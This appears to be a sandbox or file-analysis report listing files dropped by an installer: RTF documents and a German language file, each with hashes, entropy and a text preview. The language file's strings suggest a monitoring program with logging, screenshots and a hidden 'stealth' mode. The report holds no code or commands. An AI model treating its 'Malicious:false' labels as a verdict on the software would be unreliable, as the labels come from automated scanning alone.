                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68054
                                                                                                                                                                                                                                                          Entropy (8bit):4.9836821536158835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFy4Te+UJHT2njX8x3TLjwUtqYepAkVZEdvI9vT4H1qRKPN6K2ZREhe5Vu3bXrr:wqJ6IT4HQ++PUIA9pP
                                                                                                                                                                                                                                                          MD5:A7279F7C4C7B0BCB8653144D541FAC2A
                                                                                                                                                                                                                                                          SHA1:6B24410FF99110DB0A369E7CB73E990B799555F8
                                                                                                                                                                                                                                                          SHA-256:CCFBF10B3E30471B234505F21E1929CA1388CD2959423E554A82E0EBF0946D21
                                                                                                                                                                                                                                                          SHA-512:B7C36C86657AE567FD1BF553965F2A6739698A70B82B6A3E64121D056A1941BAD8A1BA867CB1D1B1D83AA7E42B7206786BC712CAD07E517DCB3A0B80F97F26FC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Tim
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42179
                                                                                                                                                                                                                                                          Entropy (8bit):5.051623327565713
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmVQP9RTaC0n1azbtSqqjgq4Tt:VklnIVQPc4Tt
                                                                                                                                                                                                                                                          MD5:5BF7705E104DAE21287D29BA6B73F990
                                                                                                                                                                                                                                                          SHA1:68FE0FAEB83DD82163599C4A0C86A42EB0E1645F
                                                                                                                                                                                                                                                          SHA-256:425E9788DA3299CCF2FE2E25AD8E4BF0EF65F22E2F10702C7EDA2FA6D160917A
                                                                                                                                                                                                                                                          SHA-512:A3D6C652A8C362B22B5F4FE4879411C5468DAAE6ACB6A13DA947D14C8E483C83138DC18212E8D2A1D22656985A2AFED8373A7023B4C4D0BD3992EDBEA0D7875E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45200
                                                                                                                                                                                                                                                          Entropy (8bit):5.054793082738369
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmm38RiaKvX2pBEz/9qj+793RM1HWMV5XA:VklnI3K4T7
                                                                                                                                                                                                                                                          MD5:C60A8FC0107FBDBEF9FDD171B44442FD
                                                                                                                                                                                                                                                          SHA1:F0F4187630411D3F6F0DE7ECD98CE99AAD45AAD9
                                                                                                                                                                                                                                                          SHA-256:576A4766C686DC03E95228C84262970BC266ECE801DB7127E68EB8F1080CCFFC
                                                                                                                                                                                                                                                          SHA-512:5E209424A9E25DF565C3648A4350AD76FF144165ACBF02FCD891B1F6EB87AA0CEBE3710F9903D9F796005724B44843E8D36E41768BF2E4188191E97ED58D5C61
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53715
                                                                                                                                                                                                                                                          Entropy (8bit):5.038599976742919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13TxjelQcX09coHJreOYSN4UIRopZMggLBbWm6V6ER4IE5RP9lIXsqJo6vjo4S:VkLjcv4TI
                                                                                                                                                                                                                                                          MD5:6E82D6B3AAD2EAEC506AA8ABD4728C58
                                                                                                                                                                                                                                                          SHA1:622141D986976DC0ADB2DB17698DBC082BE74674
                                                                                                                                                                                                                                                          SHA-256:91A6F151A727086D36660F130446F70FE6115808C5E56FA36FC82A8CAE25A481
                                                                                                                                                                                                                                                          SHA-512:B0C477686E7583EF9412912A72A7644F80D20EB8EF904E7B0A3F2F89D4B2DB0DD7FC9FDB61B4969787AAE3C931D1B15EA8BAE1BC07CE3D340F40CD3D182804A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44992
                                                                                                                                                                                                                                                          Entropy (8bit):5.035044653724291
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4Jt0TaGC5X2kwYp+CjcWkDxKWzHkp2Cj3DQS7RfUaMpQXtjfGKSMpoFbaq0r:VkHx/o6Ns4Tp
                                                                                                                                                                                                                                                          MD5:A4B133AED3E483AD18F78E5A993333DC
                                                                                                                                                                                                                                                          SHA1:0B90C31D5E00389329B841BC8AAE13DD5773A69B
                                                                                                                                                                                                                                                          SHA-256:CAAC008A1495175A0AE18434537C0053B46D5289F3128800D689BC7FA4F92830
                                                                                                                                                                                                                                                          SHA-512:A34192B8217C7352E3907976062BC5B3BAB5B6FDE2C9A8C885CA8DD8E48EE9A94226EBF6AE1E05371A051CF041E8C4DCB08957F257C5A349EFEF679A5059F8FF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44713
                                                                                                                                                                                                                                                          Entropy (8bit):5.051900255865599
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqARQOjeF/RS+Lp9XhPXhnPnCLTXM40K:VklnIqxR4Td
                                                                                                                                                                                                                                                          MD5:1BD599E9D3E51995F3F39B6B680BCF5D
                                                                                                                                                                                                                                                          SHA1:E0192B60533DD734AD8B4500125A25E78A48E551
                                                                                                                                                                                                                                                          SHA-256:3894B01C5A095E0EA124AE6FE638F75990FB12D96FFD000EDAAD43D9399D5DEF
                                                                                                                                                                                                                                                          SHA-512:726F4E9BED9C4CBF56AC082A81512ED842EADC28028FD6A8895954C4E946F20681E8C6A28236674E3B1006538E10EC2F5974C4F115D74DD1928E7DC2ABA3FF07
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44025
                                                                                                                                                                                                                                                          Entropy (8bit):5.051099948351621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqoRWhsPVafhFuogRkPcStxSUeXeq4Ts:VklnIqi4Ts
                                                                                                                                                                                                                                                          MD5:FCD907A82F0CC0B40AB352E6A1D330A9
                                                                                                                                                                                                                                                          SHA1:AB3E2A7ED7791D51D6656A5A133A09CB87A98688
                                                                                                                                                                                                                                                          SHA-256:20618AE093716DFFBF4B00CEBAADE7A5E33D628858BE3B81DD766343752CA2EF
                                                                                                                                                                                                                                                          SHA-512:260890BB6352AE544AFA660DB1CF91CC1CDF5A2843F753F9291F1DB96E7B7E7E1BA10960E48A58F9B42CDD20CFE33C27A10A0A522A713EE8D95711A8ED31A307
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46393
                                                                                                                                                                                                                                                          Entropy (8bit):5.040883358685065
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmq9RXRjOotI3qyLbfl4vBLbflAvQLbft:VklnIqG4Tb
                                                                                                                                                                                                                                                          MD5:A44BC6DAA0FB852B0CC5F2930B338509
                                                                                                                                                                                                                                                          SHA1:2E78886E8630AA1D8AEB320F5324635B36FE241E
                                                                                                                                                                                                                                                          SHA-256:87355813ED68AB3CC1FC6AC77DBC2AA16248012FACAEE98F06F106A28D2F688D
                                                                                                                                                                                                                                                          SHA-512:A589A22F3E556B104ECA9D4E557B65218C254587DC3CD73569D7F0101CD1073E61068699BD48CF0B4A695772C82FAD1A689ABC7D6CCB90A043E1FE729140B795
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42991
                                                                                                                                                                                                                                                          Entropy (8bit):5.042023549126302
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFkwxjeVGh+DoLLXI1nhDGi3w2EHlT2njX8x3DGRlBB42Nn92knS7eOZ/6A97:wqR3zIA97
                                                                                                                                                                                                                                                          MD5:4406D386834A212EB3AD85B6410AEE1B
                                                                                                                                                                                                                                                          SHA1:FE40A4177AEBEF814E9104273942637E62180E61
                                                                                                                                                                                                                                                          SHA-256:4C083A2E2B9A6314BE4C4616010210D7191A949BB5849D140631CAA6AF0B8E5D
                                                                                                                                                                                                                                                          SHA-512:DAD1AC26094545FFBB57D74B6C04ACB2E5279F8B045D3BD53CB27ACD877F6FDC4C9A6894B7A703C5A94EF6805E2AD98D7B1C6588CF9CF90BB790AE2625AA8AD0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19337
                                                                                                                                                                                                                                                          Entropy (8bit):5.025077721740106
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:USTHedgI9UbHmTZCmfwoxKza62zxpZ6EV00azBKh:U0I2bH2kRKKzwxpZnj4Kh
                                                                                                                                                                                                                                                          MD5:7EB33A9C085F56E0004E166D1702EEA1
                                                                                                                                                                                                                                                          SHA1:C8C514993F866C3282F2E53C231E5961EE8E3B90
                                                                                                                                                                                                                                                          SHA-256:F96F92DFCD7C119EBD998989312F009D9ABA9E5C3A5B7899A8DD146370F5AFC4
                                                                                                                                                                                                                                                          SHA-512:BA7B7716AD33D71247CEE9CC8B630BBA9B948654D366A892D5F1471B4A5FAD908A774600E8577223FFC043D4BD620BFC4222D2CC833B2AD1DF13CF7ADA5A203E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="Start"..tbStartHint="Erfassung aktivieren"..tbStop="Stop"..tbStopHint="Erfassung deaktivieren"..tbFind="Finden"..tbFindHint="Nach Protokoll Informationen suchen"..tbSetting="Einstellungen"..tbSettingHint="Programm Einstellungen"..tbAbout=".ber"..tbAboutHint=".ber/ Informationsinfo"..tbHomePage="Home Page"..tbHomePageHint="Gehen Sie zum Programm Home Page"..tbToday="Heute"..tbTodayHint="Gehen Sie zum heutigen Protokoll"..tbHide="Verstecken"..tbHideHint="Stelth Modus (Kein Icon im Systempfad)"..tbMinimize="Minimieren"..tbMinimizeHint="Auf Ablage minimieren"..tbExit="Ausgang"..tbExitHint="Ausgang und Protokollstopp"..gbLog="Vorgangsprotokoll"..tCurrLogSize="Protokollgr..e (Mb)"..tCurrScrSize="Screenshots Gr..e (Mb)"..tCur
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42867
                                                                                                                                                                                                                                                          Entropy (8bit):5.0494431999578
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BXKxdC6T2njX8x3TLjwUtqYepfwDyQbLjJAfop7ATX8zOpSyXZSpyEW7HuHlV1Z9:BYFfIA9p
                                                                                                                                                                                                                                                          MD5:2130BD1D1919D711A5AF21035C3503CC
                                                                                                                                                                                                                                                          SHA1:0F92AF4AD5D98942DD464C2D2DBFB2D23FC7BF1B
                                                                                                                                                                                                                                                          SHA-256:C62CAA4DFD7ADE415A27535B12C7B80992C1617106CEA4D271D8B159D97DC724
                                                                                                                                                                                                                                                          SHA-512:28EF2FF5A3AA227A1532E1283EB5D530F8BC45C401B346503A60CA026718D64A5CB020D198DC43B16FCD3FA751E36524D8BDDEB7E8FA9D3209B86211AB728612
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 020206
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37003
                                                                                                                                                                                                                                                          Entropy (8bit):5.038330646707192
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BbKxdCjOcPI0QhhiLVZMB5WjuOBYB1xlmZ/6A9P:Bs5Un9IA9P
                                                                                                                                                                                                                                                          MD5:75DF6CB458A94E38B33006A5BB1AB3CA
                                                                                                                                                                                                                                                          SHA1:7EE17FB0A1760D5C89FC4B86CB98CF3EA71E333D
                                                                                                                                                                                                                                                          SHA-256:81275BC2F9DF017DD33438D44E3F4ACECDAC376281CD5C37F782538D937F8E3F
                                                                                                                                                                                                                                                          SHA-512:89CD75E4140B9C9F90DB760FA806039017AF4558FC74AE5327F547DD7E3DF14710925F1F7C55C648F7A947753B48703A1AC47F905C9EDF454599828F3CD4A86D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
